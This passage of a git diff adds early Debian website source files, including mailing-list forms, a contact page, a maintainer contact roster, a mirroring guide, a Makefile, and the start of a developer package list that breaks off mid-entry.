<STRONG>debian-doc</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-l10n-spanish"> + <STRONG>debian-l10n-spanish</STRONG><BR> + +<TD VALIGN="TOP"> + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-www"> + <STRONG>debian-www</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-policy"> + <STRONG>debian-policy</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-admintool"> + <STRONG>debian-admintool</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-autobuild"> + <STRONG>debian-autobuild</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-dpkg"> + <STRONG>debian-dpkg</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-qa"> + <STRONG>debian-qa</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-publicity"> + <STRONG>debian-publicity</STRONG><BR> +<!-- + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-private"> + <STRONG>debian-private</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-consultants"> + <STRONG>debian-consultants</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="deity"> + <STRONG>deity</STRONG><BR> +--> + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="-deity-digest"> + <STRONG>debian-deity-digest</STRONG><BR> + +<!-- + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-testing"> + <STRONG>debian-testing</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-security-private"> + <STRONG>debian-security-private</STRONG><BR> +--> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-bugs-dist"> + <STRONG>debian-bugs-dist</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-bugs-forwarded"> + <STRONG>debian-bugs-forwarded</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-bugs-closed"> + <STRONG>debian-bugs-closed</STRONG><BR> + + <INPUT TYPE="checkbox" NAME="unsubscribe" VALUE="debian-bugs-reports"> + <STRONG>debian-bugs-reports</STRONG> +</TABLE> + +<BR><STRONG>Your E-Mail address:</STRONG> +<BR><INPUT TYPE="text" NAME="user_email" SIZE="60"><BR> +<INPUT TYPE="SUBMIT"> <INPUT TYPE="RESET"> +</FORM> + +<HR> +<P>Back to the <A HREF="../">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "MailingLists", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/Makefile b/english/Makefile new file mode 100644 index 00000000000..60fc76ab19e --- /dev/null +++ b/english/Makefile @@ -0,0 +1,92 @@ +LANG=en +HTMLDIR=../../debian.org +TEMPLDIR=template/debian +ENGLISHSRCDIR=../english +# EPILOG=--epilog=weblint +$(HTMLDIR)/%.html.en : %.wml $(TEMPLDIR)/template.wml + cd $(<D) && wml $(EPILOG) $(<F) +# cd $(<D) && wml -o $@ $(EPILOG) $(<F) + +# translators should comment out the line for any file they haven't translated. +all:\ + $(HTMLDIR)/contact.html.$(LANG) \ + $(HTMLDIR)/developers_corner.html.$(LANG) \ + $(HTMLDIR)/donations.html.$(LANG) \ + $(HTMLDIR)/index.html.$(LANG) \ + $(HTMLDIR)/license.html.$(LANG) \ + $(HTMLDIR)/news.html.$(LANG) \ + $(HTMLDIR)/news1997.html.$(LANG) \ + $(HTMLDIR)/related_links.html.$(LANG) \ + $(HTMLDIR)/social_contract.html.$(LANG) \ + $(HTMLDIR)/sponsor.html \ + $(HTMLDIR)/support.html.$(LANG) \ + $(HTMLDIR)/2.0/2.0beta_CD.html.$(LANG) \ + $(HTMLDIR)/MailingLists/subscribe.html.$(LANG) \ + $(HTMLDIR)/MailingLists/unsubscribe.html.$(LANG) \ + $(HTMLDIR)/devel/extract_key.html.$(LANG) \ + $(HTMLDIR)/devel/people.html.$(LANG) \ + $(HTMLDIR)/devel/help.html.$(LANG) \ + $(HTMLDIR)/devel/ports.html.$(LANG) \ + $(HTMLDIR)/devel/incoming_mirrors.html.$(LANG) \ + $(HTMLDIR)/devel/release_info.html.$(LANG) \ + $(HTMLDIR)/devel/maintainer_contacts.html.$(LANG) \ + $(HTMLDIR)/devel/rsync_examples.html.$(LANG) \ + $(HTMLDIR)/devel/mirror.html.$(LANG) \ + $(HTMLDIR)/doc/index.html.$(LANG) \ + $(HTMLDIR)/distrib/distrib.html.$(LANG) \ + $(HTMLDIR)/distrib/ftplist.html.$(LANG) \ + $(HTMLDIR)/distrib/packages.html.$(LANG) \ + $(HTMLDIR)/distrib/vendors.html.$(LANG) \ + $(HTMLDIR)/intro/about.html.$(LANG) \ + $(HTMLDIR)/intro/cooperation.html.$(LANG) \ + $(HTMLDIR)/intro/license_disc.html.$(LANG) \ + $(HTMLDIR)/intro/cn.html.$(LANG) \ + $(HTMLDIR)/intro/free.html.$(LANG) \ + $(HTMLDIR)/intro/why_debian.html.$(LANG) \ + $(HTMLDIR)/logos/index.html.$(LANG) \ + $(HTMLDIR)/security/index.html.$(LANG) \ +# $(HTMLDIR)/ + + +# +# TRANSLATORS SHOULD NOT HAVE TO TOUCH ANYTHING BELOW THIS LINE +# + +$(HTMLDIR)/index.html.$(LANG): index.wml news.wml $(TEMPLDIR)/mainpage.wml $(TEMPLDIR)/ctime.wml + wml index.wml + +# with no rule, the default ruleset (at the top) is used +$(HTMLDIR)/devel/people.html.$(LANG): devel/people.wml $(ENGLISHSRCDIR)/devel/people.names + + +# template dependencies + +template/debian/basic.wml: template/debian/navbar.wml + touch template/debian/basic.wml + +template/debian/footer.wml: template/debian/ctime.wml + touch template/debian/footer.wml + +# template/debian/languages.wml: template/debian/ +# touch template/debian/languages.wml + +template/debian/menubar.wml: template/debian/footer.wml + touch template/debian/menubar.wml + +# template/debian/recent_news.wml: template/debian/ +# touch template/debian/recent_news.wml + +# template/debian/ctime.wml: template/debian/ +# touch template/debian/ctime.wml + +template/debian/mainpage.wml: template/debian/basic.wml template/debian/menubar.wml + touch template/debian/mainpage.wml + +# template/debian/navbar.wml: template/debian/ +# touch template/debian/navbar.wml + +template/debian/template.wml: template/debian/basic.wml template/debian/footer.wml + touch template/debian/template.wml + +people: devel/people.wml + cd devel && wml people.wml diff --git a/english/contact.wml b/english/contact.wml new file mode 100644 index 00000000000..d2cfc4a9d63 --- /dev/null +++ b/english/contact.wml @@ -0,0 +1,52 @@ +#!wml -o ../../debian.org/%BASE.html.en --epilog=weblint +#use wml::debian::template title="Debian GNU/Linux — Getting in Contact with Us" + +<H1>Getting in Contact with Us</H1> + +<P>For general information on Debian, please see our web site, +<A href="http://www.debian.org/">http://www.debian.org/</A>, and our ftp site, +<A href="ftp://ftp.debian.org/debian/">ftp://ftp.debian.org/debian/</A>. + +<P>Our FAQ will answer many of your questions. Please refer to it at +<A href="http://www.debian.org/doc/FAQ/">http://www.debian.org/doc/FAQ/</A> +or +<A href="ftp://ftp.debian.org/debian/doc/FAQ/">ftp://ftp.debian.org/debian/doc/FAQ/</A>. +Postscript, text, html, and info versions are on the ftp site. + +<P>You may find the <A href="http://www.debian.org/cgi-bin/fom">Debian faqomatic</A> useful. +It can be used to look up answers to common questions. + +<P>We have a very active user mailing list where Debian users and +developers can answer your questions. +Simply +<A href="http://www.debian.org/MailingLists/subscribe.html">subscribe</A> to <EM>debian-user</EM> +and send your question to +<A href="mailto:debian-user@lists.debian.org">debian-user@lists.debian.org</A>. +All questions regarding +<UL> +<LI>installation +<LI>configuration +<LI>supported hardware +</UL> +should be sent there. + +<P>If you have a more development related question, there is a mailing list the developers +use to communicate with each other. +Simply <A href="http://www.debian.org/MailingLists/subscribe.html">subscribe</A> to +<EM>debian-devel</EM> and then send e-mail to +<A href="mailto:debian-devel@lists.debian.org">debian-devel@lists.debian.org</A>. + +<P>If you would like to file a bug against a Debian +package, see +<A href="http://www.debian.org/Bugs/">http://www.debian.org/Bugs/</A> or +<A href="ftp://ftp.debian.org/debian/doc/bug-reporting.txt">ftp://ftp.debian.org/debian/doc/bug-reporting.txt</A> +for instructions. + +<P>If you would like to make the developers aware of a Debian security +problem in a discreet manner, send e-mail to +<A href="mailto:security@debian.org">security@debian.org</A>. + +<P>E-mail regarding the web site should be addressed to +<A href="mailto:webmaster@debian.org">webmaster@debian.org</A>. + +<:= languages ("$(HOME)", ".", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/devel/extract_key.wml b/english/devel/extract_key.wml new file mode 100644 index 00000000000..79595b3e3a2 --- /dev/null +++ b/english/devel/extract_key.wml @@ -0,0 +1,12 @@ +#!wml -o ../../../debian.org/devel/%BASE.html.en +#use wml::debian::template title="Extract PGP Key" + +<H1>Extract PGP Key</H1> + +<form method="post" action="http://cgi.debian.org/cgi-bin/pgp_key_extract.pl"> +<strong>User Id:</strong> +<br><input type="text" name="user_id" SIZE="60"><br> +<input type="submit"> <input type="reset"> +</form> + +<:= languages ("$(HOME)", "devel", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/devel/help.wml b/english/devel/help.wml new file mode 100644 index 00000000000..975b9727f16 --- /dev/null +++ b/english/devel/help.wml @@ -0,0 +1,42 @@ +#!wml -o ../../../debian.org/devel/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - How You Can Help?" + +<H1>How You Can Help?</H1> + +<P>Debian is produced entirely by volunteers. +We are generally looking for new developers who have some +technical knowledge, an interest in free software and some free time. +If you haven't already, you should read through most of the web pages +to get a better understanding of what we are trying to do. +Pay particular attention to the +<A HREF="../social_contract#guidelines">Debian Free Software Guidelines</A> +in our +<A HREF="../social_contract">Social Contract</A>. + +<P>Next, you should +<A HREF="../support#mail_lists">subscribe</A> to the debian-devel mailing list +for a while and look at the <A HREF="../doc/prospective-packages.html">Work-Needing +and Prospective Packages</A> document to see what packages need developers. +Taking over someone else's package is the best way to start out as a developer +as you can learn from what the previous maintainer has already done. +Finally, if you see an area that you can help out, read the +<A HREF="../doc/packaging-manuals/developers-reference/">Developers-Reference</A> for +instructions on how to join Debian. + +<P>Besides the many developers, Debian also needs +<A HREF="../donations">donations</A> of money and use of machines for +development and connectivity. We are still looking for +<A HREF="mirror">mirrors</A> in some parts of the world. + +<P>Even if you don't have time to maintain packages or aren't in a +position to make monetary or equipment donations to Debian you can +still help out by filing +<A HREF="../Bugs/">bug reports</A> against packages that have errors in them. +To make it easier to file bugs, there is even a +<A HREF="../Packages/stable/utils/bug.html">bug program</A> +to make filing reports easy. + +<HR> +<P>Back to the <A HREF="../">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "devel", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/devel/incoming_mirrors.wml b/english/devel/incoming_mirrors.wml new file mode 100644 index 00000000000..6bf619f4021 --- /dev/null +++ b/english/devel/incoming_mirrors.wml @@ -0,0 +1,31 @@ +#!wml -o ../../../debian.org/devel/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - Mirrors of Incoming" + +<H1>Mirrors of Incoming</H1> + +This is a list of mirrors of the Incoming directory for new packages to +Debian. If you are not familiar with what this is, then you do not want +to get packages from one of these sites. Packages on these sites are totally +untested (except possibly by the person who packaged it) so it is possible +that they contain packaging errors or bugs in executables that could render +your machine unusable. + +<P>In addition, the files in this directory have <em>not</em> been checked by md5sum +or pgp to verify that they are intact or were uploaded by a registered debian +developer. + +<P>You have been warned. + +<P> +<A HREF="ftp://llug.sep.bnl.gov/pub/debian/Incoming">ftp://llug.sep.bnl.gov/pub/debian/Incoming</A> +(US)<BR> +<A HREF="ftp://ftp.lh.umu.se/pub/linux/debian-Incoming">ftp://ftp.lh.umu.se/pub/linux/debian-Incoming</A> +(Sweden)<BR> +<A HREF="ftp://ftp.de.debian.org:/pub/debian-incoming/">ftp://ftp.de.debian.org:/pub/debian-incoming/</A> +(Germany)<BR> + + +<HR> +<P>Back to the <A href="../">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "devel", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/devel/maintainer_contacts.wml b/english/devel/maintainer_contacts.wml new file mode 100644 index 00000000000..c8d377d5e96 --- /dev/null +++ b/english/devel/maintainer_contacts.wml @@ -0,0 +1,166 @@ +#!wml -o ../../../debian.org/devel/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - Maintainer Contacts" + +<H1>Maintainer Contacts</H1> + +<P>Occasionally people need to contact someone about a particular aspect +of Debian. +The following is a list of different jobs and who is responsible for each. +Note that many functions are covered by a group of people with a generic +address that sends copies to everyone in the group. Use them when +they exist - especially in any maintenance scripts. + + +<P>This has been maintained rather piecemeal so if anything is missing or +incorrect please send corrections to +<A HREF="mailto:webmaster@debian.org">webmaster@debian.org</A>. + +<UL> +<LI>Board of Directors of Software in the Public Interest (SPI): + <<A HREF="mailto:spi-board@lists.buoy.com">spi-board@lists.buoy.com</A>> + <UL> + <LI>SPI President -- + <<A HREF="mailto:spi-president@debian.org">spi-president@debian.org</A>> + <BR>     <em>current</em> Bruce Perens + <<A HREF="mailto:bruce@debian.org">bruce@debian.org</A>> + <LI>Ian Murdock + <<A HREF="mailto:imurdock@cs.arizona.edu">imurdock@cs.arizona.edu</A>> + <LI>Tim Sailer + <<A HREF="mailto:sailer@debian.org">sailer@debian.org</A>> + <LI>Ian Jackson + <<A HREF="mailto:ian@chiark.greenend.org.uk">ian@chiark.greenend.org.uk</A>> + </UL> +Note: SPI is the non-profit corporation that oversees Debian. Mail can be sent to +SPI at <<A HREF="mailto:spi@debian.org">spi@debian.org</A>>. + +<LI>Officers: + <UL> + <LI>Leader -- + <<A HREF="mailto:leader@debian.org">leader@debian.org</A>> + <BR>     <em>current</em> Ian Jackson + <<A HREF="mailto:ian@chiark.greenend.org.uk">ian@chiark.greenend.org.uk</A>> + <LI>Senior VP -- + <BR>     <em>current</em> ??? + <LI>VP Engineering -- + <BR>     <em>current</em> Brian C. White + <<A HREF="mailto:bcwhite@verisim.com">bcwhite@verisim.com</A>> + <LI>Treasurer -- + <<A HREF="mailto:treasurer@debian.org">treasurer@debian.org</A>> + <BR>     <em>current</em> Tim Sailer + <<A HREF="mailto:sailer@debian.org">sailer@debian.org</A>> + </UL> + +<LI>Managers: + <UL> + <LI>Security -- + <<A HREF="mailto:security@debian.org">security@debian.org</A>><BR> +      <em>current</em> Christian Hudon + <<A HREF="mailto:chrish@debian.org">chrish@debian.org</A>><BR> +      and Martin (Joey) Schulze (alternate) + <<A HREF="mailto:joey@infodrom.north.de">joey@infodrom.north.de</A>><BR> + <LI>New Maintainers -- + <<A HREF="mailto:new-maintainer@debian.org">new-maintainer@debian.org</A>><BR> +      <em>current</em> Igor Grobman + <<A HREF="mailto:igor@vaca.net">igor@vaca.net</A>><BR> +       Martin Schulze + <<A HREF="mailto:joey@debian.org">joey@debian.org</A>><BR> +      and James Troup + <<A HREF="mailto:jjtroup@comp.brad.ac.uk">jjtroup@comp.brad.ac.uk</A>><BR> + <LI>Debian machine administration + <<A HREF="mailto:debian-admin@debian.org">debian-admin@debian.org</A>><BR> + <em>This is the address to use when encountering problems on one of Debian's machines, + including password problems or you need a package installed.</em> + <LI>Quality Assurance manager -- Vincent Renardias + <<A HREF="mailto:vincent@waw.com">vincent@waw.com</A>> + <LI>Policy Manager -- Ian Jackson(?) + <<A HREF="mailto:ian@chiark.greenend.org.uk">ian@chiark.greenend.org.uk</A>> + <LI>Documentation manager -- Susan Kleinmann + <<A HREF="mailto:sgk@debian.org">sgk@debian.org</A>> + <LI>Director of Testing -- Brandon Mitchell + <<A HREF="mailto:bhmit1@mail.wm.edu">bhmit1@mail.wm.edu</A>> + <LI>QA team -- + <<A HREF="mailto:debian-qa@lists.debian.org">debian-qa@lists.debian.org</A>><BR> +      <em>current</em> Vincent Renardias + <<A HREF="mailto:vincent@waw.com">vincent@waw.com</A>> (leader) + </UL> + +<LI>Ftp, Web, Bugs: + <UL> + <LI>Sys Admin of master.debian.org -- Mark ??? + <<A HREF="mailto:mark@debian.org">mark@debian.org</A>> + <LI>FTP archive -- Guy Maor + <<A HREF="mailto:maor@ece.utexas.edu">maor@ece.utexas.edu</A>> + <LI>Web Page Maintainer -- + <<A HREF="mailto:webmaster@debian.org">webmaster@debian.org</A>> + <BR>     <em>current</em> Jay Treacy + <<A HREF="mailto:treacy@debian.org">treacy@debian.org</A>> + <LI>Bug list -- + <<A HREF="mailto:owner@bugs.debian.org">owner@bugs.debian.org</A>> + <BR>     <em>current</em> Ian Jackson + <<A HREF="mailto:ian@chiark.greenend.org.uk">ian@chiark.greenend.org.uk</A>> + <LI>Mail list archives (on Debian web pages) -- Guy Maor + <<A HREF="mailto:maor@ece.utexas.edu">maor@ece.utexas.edu</A>> + </UL> + +<LI>Misc: + <UL> + <LI>PGP Key Maintainer -- + <<A HREF="mailto:pgp-update@debian.org">pgp-update@debian.org</A>><BR> +      <em>current</em> Igor Grobman + <<A HREF="mailto:igor@debian.org">igor@debian.org</A>> + <BR>     and James Troup + <<A HREF="mailto:jjtroup@comp.brad.ac.uk">jjtroup@comp.brad.ac.uk</A>><BR> + <LI>Mail List Administrator -- + <<A HREF="mailto:listmaster@lists.debian.org">listmaster@lists.debian.org</A>> +      <em>current</em> Martin Schulze + <<A HREF="mailto:joey@debian.org">joey@debian.org</A>><BR> +       Scott Ellis + <<A HREF="mailto:scott@debian.org">scott@debian.org</A>> + <LI>Publicity -- + <<A HREF="mailto:debian-publicity@debian.org">debian-publicity@debian.org</A>><BR> + <LI>mirror list -- + <<A HREF="mailto:mirrors@debian.org">mirrors@debian.org</A>><BR> +      <em>current</em> Karl Ferguson + <<A HREF="mailto:karl@tower.net.au">karl@tower.net.au</A>> + <LI>non-US mirror list -- Heiko Schlittermann + <<A HREF="mailto:heiko@debian.org">heiko@debian.org</A>> + <LI>DNS maintainer -- Tim Sailer + <<A HREF="mailto:sailer@debian.org">sailer@debian.org</A>> [from buoy.com] + <LI>Deity team -- Behan Webster + <<A HREF="mailto:behanw@verisim.com">behanw@verisim.com</A>> (leader) + <LI>m68 porting team -- James Troup + <<A HREF="mailto:jjtroup@comp.brad.ac.uk">jjtroup@comp.brad.ac.uk</A>> (leader?) + <LI>alpha porting team -- ??? + <LI>sparc porting team -- ??? + <LI>powerpc porting team -- Martin Schulze + <<A HREF="mailto:joey@debian.org">joey@debian.org</A>> + <LI>mips porting team -- Vincent Renardias + <<A HREF="mailto:vincent@waw.com">vincent@waw.com</A>> + </UL> + +<LI>Docs: + <UL> + <LI>Policy Manual -- ??? + <LI>Developer's Reference -- ??? + <LI>FAQ (contained in doc-debian)<BR> + Santiago Vila + <<A HREF="mailto:sanvila@ctv.es">sanvila@ctv.es</A>>,<BR> + <LI>Prospective Packages -- + <<A HREF="mailto:wnpp@debian.org">wnpp@debian.org</A>><BR> +      <em>current</em> Johnie Ingram + <<A HREF="mailto:johnie@netgod.net">johnie@netgod.net</A>><BR> + <LI>Packaging Manual -- Ian Jackson + <<A HREF="mailto:ian@chiark.greenend.org.uk">ian@chiark.greenend.org.uk</A>> + <LI>install disks -- + <<A HREF="mailto:boot-disks@packages.debian.org">boot-disks@packages.debian.org</A>><BR> +      <em>current</em> Sven Rudolph + <<A HREF="mailto:sr1@os.inf.tu-dresden.de">sr1@os.inf.tu-dresden.de</A>> + <LI>install.html -- Igor Grobman + <<A HREF="mailto:igor@debian.org">igor@debian.org</A>> + <LI>Dpkg Internals Manual -- Klee Dienes + <<A HREF="mailto:klee@mit.edu">klee@mit.edu</A>> + <LI>dselect tutorial -- ??? + </UL> +</UL> + +<:= languages ("$(HOME)", "devel", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/devel/mirror.wml b/english/devel/mirror.wml new file mode 100644 index 00000000000..67c88f92073 --- /dev/null +++ b/english/devel/mirror.wml @@ -0,0 +1,138 @@ +#!wml -o ../../../debian.org/devel/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux - Mirroring" + +<H1>Mirroring</H1> + +<P>The world is a big place and without the large number of +mirrors around the world many people would have +difficulty acquiring Debian. + +<P>Of course, that means that we need people to create and maintain +these mirrors. That means you. If you are in a position to donate some disk +space and connectivity to making Debian more accessible, then this +page is for you. + +<P>Debian has both ftp archives and web sites. The ftp archive contains +all the packages, source and installation material. The web site +contains background information on Debian, documentation, material for +developers and links to related sites. You can choose to mirror +the web, ftp or both. You can even keep the mirror private, but most +people choose to add ftp sites to the <A HREF="../misc/README.mirrors">mirror list</A>. + +<H2>Official Mirrors</H2> +<P>In addition, you can choose to become an official Debian site. +Official sites get an address of the form ftp.<country>.debian.org +or www.<country>.debian.org. These are the best advertised and +most used sites; the face of Debian for most people. Because of this +we have certain minimum requirements for official sites: + +<UL> +<LI>The site must be reliable and be up 24 hours a day. The machine must + not be heavily loaded. +<LI>It must have a decent connectivity (relative to the respective country). + Bandwidth equivalent to a T1 connection is preferred. +<LI>For ftp: the debian ftp hierarchy must be available under /debian + This is done for consistency between sites. +<LI>For ftp: we are asking that all new official ftp sites also make the ftp archive + available using http. With http/1.1 transfers have the potential of being + more efficient than with ftp so we are trying to make a move in that direction. + Of course, we would appreciate it if all mirrors allowed http access. +<LI>For www: a real virtual server with its own IP address. If possible + the list and bug archives should be mirrored too (see the notes on + mirroring below). +<LI>For www: cgi scripts are run centrally on cgi.debian.org so you don't + need to worry about them. +<LI>For www: content negotiation must be enabled. This is to allow us to serve + the web pages in multiple languages transparently (for those who have set up + their browser properly). Apache supports this quite well. If you have questions + about this please send mail to + <A HREF="mailto:webmaster@debian.org">webmaster@debian.org</A> +<LI>Disk space commitments (with room for expansion): + 1+GB for www (includes list and bug archives), + 3+GB for ftp +<LI>The mirror must be updated at least once a day. If possible, mirror the + bug archives more frequently. +</UL> +Please note that these are really just guidelines. If you are unsure of something, +send a note to <A HREF="mailto:webmaster@debian.org">webmaster@debian.org</A> +with your questions. + +<P>If you would like to become an official mirror, send the name and +address of the machine along with the name and e-mail of the person +who will be maintaining the mirror to +<A HREF="mailto:webmaster@debian.org">webmaster@debian.org</A>. The webmaster +will get the DNS set up, and if an ftp site added to the list of mirrors. +When everything is working, your site will be added to the web pages. + +<P>Currently only one official site per country is being set up. If your +country already has one, you can still set up an unofficial mirror. +Debian is still looking for official mirrors in South America and Africa +(long term goals include Antarctica and a mirror in space. Don't laugh, +we've already run experiments on the space shuttle). + +<H2>Mirroring</H2> +Mirroring is the same for both official and unofficial sites. +For ftp sites simply mirror +<A HREF="ftp://debian.crosslink.net/pub/debian">ftp://debian.crosslink.net/pub/debian</A>. +For web sites mirror +<A HREF="ftp://debian.crosslink.net/www/debian.org">ftp://debian.crosslink.net/www/debian.org</A> +and +<A HREF="ftp://debian.crosslink.net/www/debian.org-local">ftp://debian.crosslink.net/www/debian.org-local</A>. +You may of course choose to mirror a site closer to you. + +<P>FTP mirrors should register with Debian in order to get included in the +mirror list. Send mail to <A HREF="mailto:mirrors@debian.org">mirrors@debian.org</A> +with the name of the mirror maintainer, mirror site, and path to the debian +archive. + +<P> Just a few notes for web mirrors: debian.org has links into debian.org-local +so your web server must allow symbolic links. Also, if your machine is running +Debian, it was decided to break Debian policy and use /doc in the web pages. +This means you should comment out 'Alias /doc/ /usr/doc/' from srm.conf . +sponsor.html and sponsor.jpg can and should be replaced by you. They are +for you to advertise your site so people know who the sponsor is. +The originals are under sponsor.deb.html and sponsor.deb.jpg as the site you +are mirroring may have replaced the ones Debian provided as examples. +The suggested maximum size for your logo is 120x60. + +<H2>Mirror Programs</H2> +Most people mirror using anonymous ftp. For this, the program 'mirror' works +well on the ftp archive. Unless you have a lot of RAM (75MB has been reported +to work), mirror has difficulty mirroring debian.org-local because the bug lists +have a large number of files. The creator of mirror is aware of the problem and +is supposed to fix it in a future version. +As you probably guessed, 'mirror' is available as a Debian package. +If you have installed the Debian package, there is a sample script for mirroring +the ftp archive in /etc/mirror/packages/ftp.debian.org . + +<P>If you have an account on the machine you are mirroring, many +people prefer rsync. Besides working better for large archives, it +allows you to use ssh for a secure connection. +You may find it useful to look an <A HREF="rsync_examples">example</A> +on using rsync to mirror Debian. Use rsync version 1.7.4 or later as earlier +versions used much more memory. + +<P>While wget works well for mirroring small sites, it is not as efficient as +mirror or rsync so is not recommended for this job. + +<H2>Content Negotiation</H2> +Content Negotiation is a method which lets a browser negotiate with a server +the type of document that should be served. While there are a number of +uses for this, the most common is to negotiate what language a document +should be served in. Using this will allow Debian to serve its pages in +multiple languages in a (technically) very elegant fashion. + +<P>For those who are using Apache, the change is almost trivial. Simply +add a section similar to the following to /etc/apache/access.conf +(substitute the directory containing the web pages for /debian/web) and +restart the server (this example works with the apache 1.3 beta releases and later): +<blockquote><pre> +<Directory /debian/web> +Options +Multiviews +</Directory> +</pre></blockquote> + +<HR> +<P>Back to the <A href="../">Debian GNU/Linux homepage</A>. + +<:= languages ("$(HOME)", "devel", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/devel/people.names b/english/devel/people.names new file mode 100644 index 00000000000..c0a68f2f11e --- /dev/null +++ b/english/devel/people.names @@ -0,0 +1,625 @@ +<DL> + +<DT><STRONG>J.H.M. Dassen (Ray) </STRONG><A HREF="mailto:ray@wi.LeidenUniv.nl"><ray@wi.LeidenUniv.nl></A> +(<A HREF="http://www.wi.LeidenUniv.nl/~jdassen/">home page</A>) +<DD><STRONG>main:</STRONG> ccmalloc, ddd, gperf, mutt, pstoedit, pstotext, xkeycaps +<DD><STRONG>non-us:</STRONG> mutt, mutt-i +<DT><STRONG>Erik Andersen </STRONG><A HREF="mailto:andersee@debian.org"><andersee@debian.org></A> +<DD><STRONG>main:</STRONG> cdda2wav +<DT><STRONG>Clint Adams </STRONG><A HREF="mailto:schizo@debian.org"><schizo@debian.org></A> +<DD><STRONG>main:</STRONG> scottfree, zsh +<DT><STRONG>Debian Admin </STRONG><A HREF="mailto:debian-admin@debian.org"><debian-admin@debian.org></A> +<DD><STRONG>main:</STRONG> libc-kheaders +<DT><STRONG>Wichert Akkerman </STRONG><A HREF="mailto:wakkerma@debian.org"><wakkerma@debian.org></A> +(<A HREF="http://www.wi.leidenuniv.nl/~wakkerma/ ">home page</A>) +<DD><STRONG>main:</STRONG> alsadriver, alsalib, alsalib-dev, alsautils, autofs, et, grep, modutils, sgrep, strace, tkcdlayout, xcdroast, xmcd +<DT><STRONG>Erik Andersen </STRONG><A HREF="mailto:andersee@debian.org"><andersee@debian.org></A> +<DD><STRONG>main:</STRONG> cdrecord +<DD><STRONG>non-free:</STRONG> nedit +<DT><STRONG>Erik andersen </STRONG><A HREF="mailto:"><></A> +(<A HREF="http://www.et.byu.edu/~andersee/ ">home page</A>) +<DD> +<DT><STRONG>Goran Andersson </STRONG><A HREF="mailto:goran_a@maths.lth.se"><goran_a@maths.lth.se></A> +(<A HREF="http://www.maths.lth.se/matematiklu/personal/goran_a/index.html">home page</A>) +<DD><STRONG>main:</STRONG> iswedish, wswedish +<DT><STRONG>Hakan Ardo </STRONG><A HREF="mailto:hakan@debian.org"><hakan@debian.org></A> +(<A HREF="http://www.ub2.lu.se/~hakan/sig.html ">home page</A>) +<DD><STRONG>contrib:</STRONG> picon-domains, picon-misc, picon-news, picon-unknown, picon-usenix, picon-users, picon-weather +<DT><STRONG>Malc Arnold </STRONG><A HREF="mailto:malc@thing.demon.co.uk"><malc@thing.demon.co.uk></A> +<DD><STRONG>main:</STRONG> af +<DD><STRONG>non-free:</STRONG> ucbmpeg, ucbmpeg-play +<DT><STRONG>Alan Bain </STRONG><A HREF="mailto:afrb2@cam.ac.uk"><afrb2@cam.ac.uk></A> +(<A HREF="http://www.chiark.greenend.org.uk/~alanb/ ">home page</A>) +<DD><STRONG>main:</STRONG> f2c, ratfor +<DT><STRONG>Mark Baker </STRONG><A HREF="mailto:mbaker@iee.org"><mbaker@iee.org></A> +<DD><STRONG>main:</STRONG> chimera2, exim, exim-doc, eximon, libpcre1, libpcre1-dev, pgrep, xdemineur, xzip +<DT><STRONG>Christophe Le Bars </STRONG><A HREF="mailto:clebars@debian.org"><clebars@debian.org></A> +(<A HREF="http://www.teaser.fr/~clebars/ ">home page</A>) +<DD><STRONG>main:</STRONG> hylafax-client, hylafax-doc, hylafax-server, knews, tkmail, wfrench, xcoral, xtel +<DD><STRONG>non-free:</STRONG> echo-linux +<DT><STRONG>Brian Bassett </STRONG><A HREF="mailto:brian@butterfly.ml.org"><brian@butterfly.ml.org></A> +<DD><STRONG>main:</STRONG> wxhelp, wxxt1 +<DT><STRONG>Douglas Bates </STRONG><A HREF="mailto:bates@stat.wisc.edu"><bates@stat.wisc.edu></A> +<DD><STRONG>main:</STRONG> r-base +<DT><STRONG>Mike Borella </STRONG><A HREF="mailto:cathmike@xnet.com"><cathmike@xnet.com></A> +<DD><STRONG>main:</STRONG> ipgrab +<DT><STRONG>Richard Braakman </STRONG><A HREF="mailto:dark@xs4all.nl"><dark@xs4all.nl></A> +<DD><STRONG>main:</STRONG> ftplib-dev, ftplib3, idutch, lesstif, lesstif-altdbg, lesstif-altdev, lesstif-bin, lesstifg, lesstifg-dbg, lesstifg-dev, lintian, wdutch, xconq, xconq-doc +<DT><STRONG>Dermot Bradley </STRONG><A HREF="mailto:bradley@debian.org"><bradley@debian.org></A> +<DD><STRONG>main:</STRONG> libpisock-dev, libpisock3, pilot-link, pilot-link-perl, pilot-link-tcl +<DT><STRONG>Michael Bramer </STRONG><A 